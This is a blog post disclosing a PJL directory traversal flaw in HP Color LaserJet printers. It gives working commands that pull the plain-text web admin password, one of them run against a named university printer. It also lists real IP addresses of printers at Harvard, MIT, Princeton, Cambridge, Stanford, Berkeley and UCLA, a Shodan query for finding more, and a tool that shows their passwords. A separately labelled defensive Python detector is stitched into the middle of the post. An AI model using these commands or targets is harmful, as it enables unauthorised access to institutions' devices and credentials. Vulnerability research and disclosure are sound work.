Vulnerability in HP Color LaserJet 4650 and 4700 printers

When you think about cyber-security, the first things that come to mind are probably personal computers or server racks, perhaps surveillance cameras given the NSA affair. Printers will probably not be among the first things you think of. However, it is important not to neglect them.

Basics of PJL

PJL is an acronym for Printer Job Language, a protocol developed by Hewlett Packard (HP) to provide a simple communication method between a host, usually a personal computer that has been told to print a document, and the printer. Listening on port 9100 by default, PJL is not restricted to HP printers but is used by other printer models as well. The language provides a set of commands, including file system commands to download and upload files remotely from and to the printing device.
A basic PJL session might look like this:

user@client:~$ telnet 192.168.178.100 9100
Trying 192.168.178.100...
Connected to 192.168.178.100.
Escape character is '^]'.
^[%-12345X@PJL
@PJL INFO ID
@PJL INFO ID
"Brother MFC-7840W:8C5-C17:Ver.L"

@PJL ECHO Hello World
@PJL ECHO Hello World

The INFO command with the parameter ID asks the printer to reply with its model name and version, while ECHO makes the printer reply with the subsequent message Hello World. This is not too thrilling yet, until you start playing around with the file system commands prefixed by FS*. For example, @PJL FSDIRLIST NAME="0:\" ENTRY=0 COUNT=999 replies with a list of files located on volume 0:\. On most HP printers, this exposes some web server related files to curious eyes. What should not happen, however, is that you can escape volume 0:\ by using a double dot. But this is exactly what you can do, and it is called a directory traversal attack: 0:\..\ reveals the parent directory of volume 0:\, and 0:\..\..\ is sufficient on most HP printers to reach the root directory of the underlying Unix system.

Open file systems

Open printer file systems allow you to directly upload files to the printer's web directory. Visit http://lks-350-375e-038-d.ls.berkeley.edu/hp/device/pjlexploit/PoC.html for a proof of concept. Although there is a protection against file system access, namely a 16-bit PJL password which has to be set via the PJL interface, it is too complicated for standard or even advanced users, who would have to know the PJL specification in order to set it up. Secondly, a 16-bit PJL password can be brute-forced within hours.

Plain text passwords

Storing plain text passwords is a sin which you are only allowed to commit as an absolute security beginner. You may not practice this technique when you are an embedded systems developer for a company whose printers are shipped worldwide. However, this is exactly what HP developers have done. Since you have access to a large part of the Unix file system, which only seems to be restricted by native file permissions, you can download the file 0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat using the PJL command FSUPLOAD (PJL commands are named from the perspective of the printer). Guess what this file contains. If you read a null-terminated ASCII string starting at offset 0x0c, you will notice that this string is the web interface administration password.
Just look at the following short PJL session, which fully exploits this vulnerability. This was a session to 164.67.135.16 at the University of California, Los Angeles, selected as an example because of the highly creative password choice.

^[%-12345X@PJL
@PJL FSUPLOAD NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16
password
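For defenders, the two traversal patterns shown in this post (the FSDIRLIST escape from volume 0:\ in the Basics section and the FSUPLOAD read of ps_3D_0D.dat above) are easy to spot in traffic captured on port 9100. The following Python script is an added example and is not code from this blog post, from HP or from the PJL Explorer project: it parses PJL command lines, separates printer replies from commands, and flags any FS* command whose NAME argument leaves its volume through a ".." path component. The session lines it runs over are constructed for the example (they reproduce the commands discussed in this post); all function and variable names are my own.

```python
import re

# Universal Exit Language sequence that opens a PJL job: ESC %-12345X.
# The telnet session in the post shows it rendered as ^[%-12345X.
UEL = "\x1b%-12345X"

# Matches PJL keyword parameters such as NAME="0:\" or OFFSET=12.
_KV_RE = re.compile(r'(\w+)\s*=\s*("[^"]*"|\S+)')


def parse_pjl_line(line):
    """Parse one PJL command line into (command, {param: value}).

    Returns None for lines that are not PJL commands (printer replies such
    as the quoted model string). A leading UEL is tolerated, and commands
    echoed back by the printer parse exactly like the ones the host sent.
    """
    line = line.strip()
    if line.startswith(UEL):
        line = line[len(UEL):]
    if not line.startswith("@PJL"):
        return None
    body = line[len("@PJL"):].strip()
    if not body:
        return "", {}          # bare "@PJL" job header
    parts = body.split(None, 1)
    command = parts[0].upper()
    rest = parts[1] if len(parts) > 1 else ""
    params = {}
    for key, value in _KV_RE.findall(rest):
        params[key.upper()] = value.strip('"')
    return command, params


def escapes_volume(name):
    """True if a PJL NAME path uses '..' to leave its volume (e.g. 0:\\..\\..\\).

    PJL paths use backslashes ("0:\\dir\\file"); forward slashes are split
    too in case a client normalises separators.
    """
    components = re.split(r"[\\/]+", name)
    return any(component == ".." for component in components)


def classify_pjl_line(line):
    """Classify a captured line as reply, benign, fs-access or traversal."""
    parsed = parse_pjl_line(line)
    if parsed is None:
        return "reply"
    command, params = parsed
    if not command.startswith("FS"):
        return "benign"
    if escapes_volume(params.get("NAME", "")):
        return "traversal"
    return "fs-access"


def audit_session(lines):
    """Return one alert per traversal attempt found in a captured session."""
    alerts = []
    for index, line in enumerate(lines, start=1):
        if classify_pjl_line(line) == "traversal":
            command, params = parse_pjl_line(line)
            alerts.append({"line": index, "command": command,
                           "name": params.get("NAME", "")})
    return alerts


# Constructed sample session (not a real capture); it reproduces the
# commands discussed in the post, including the path of ps_3D_0D.dat.
SAMPLE_SESSION = [
    "\x1b%-12345X@PJL",
    "@PJL INFO ID",
    "@PJL ECHO Hello World",
    '@PJL FSDIRLIST NAME="0:\\" ENTRY=0 COUNT=999',
    '@PJL FSDIRLIST NAME="0:\\..\\..\\" ENTRY=0 COUNT=999',
    '@PJL FSUPLOAD NAME="0:\\..\\..\\hpmnt\\dsk_cf0a\\PermStore\\ps_3D_0D.dat"'
    ' OFFSET=12 SIZE=16',
    '"Brother MFC-7840W:8C5-C17:Ver.L"',
]

if __name__ == "__main__":
    for alert in audit_session(SAMPLE_SESSION):
        print("line {line}: {command} escapes its volume via {name}".format(**alert))
```

The check is deliberately narrow: a plain FSDIRLIST of 0:\ is normal administrative traffic and is reported as fs-access, so only the ".." escape raises an alert. Since a 16-bit PJL password gives little protection, as the post notes, the practical mitigation is to keep port 9100 reachable only from the print server and to alert on any FS* traversal seen on the wire.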

Explore printers yourself

A web-based PJL exploring tool called PJL Explorer has been developed to allow easy graphical access to the printer file system. You can access it at http://blechschmidt.saarland/printers/. PJL Explorer allows you to browse the printer file system and to upload and delete files. To find vulnerable printers, run the following search query using a free Shodan account: port:9100 hp.
The source code of the PJL Explorer is available on Github.

Universities of Harvard, Princeton and Cambridge affected

Harvard: 140.247.118.185, 140.247.92.198, 128.103.90.40
Massachusetts Institute of Technology: 18.115.2.89, 18.116.0.129
Princeton: 128.112.35.10, 128.112.112.112, 128.112.32.43
Cambridge: 131.111.168.138, 131.111.39.27
Stanford University: 171.67.204.34
University of California, Berkeley: 128.32.208.18, 128.32.19.225, 169.229.207.65
University of California, Los Angeles: 128.97.11.33, 164.67.135.16, 128.97.64.72

For legal reasons, passwords are not included in this blog post. To view a printer password, click one of the above links to open that printer in the PJL Explorer, which displays the password.

View the vulnerability report which I have sent to Hewlett Packard. According to the reply of HP, two security bulletins have already been published, one in 2010 and another one in 2013.
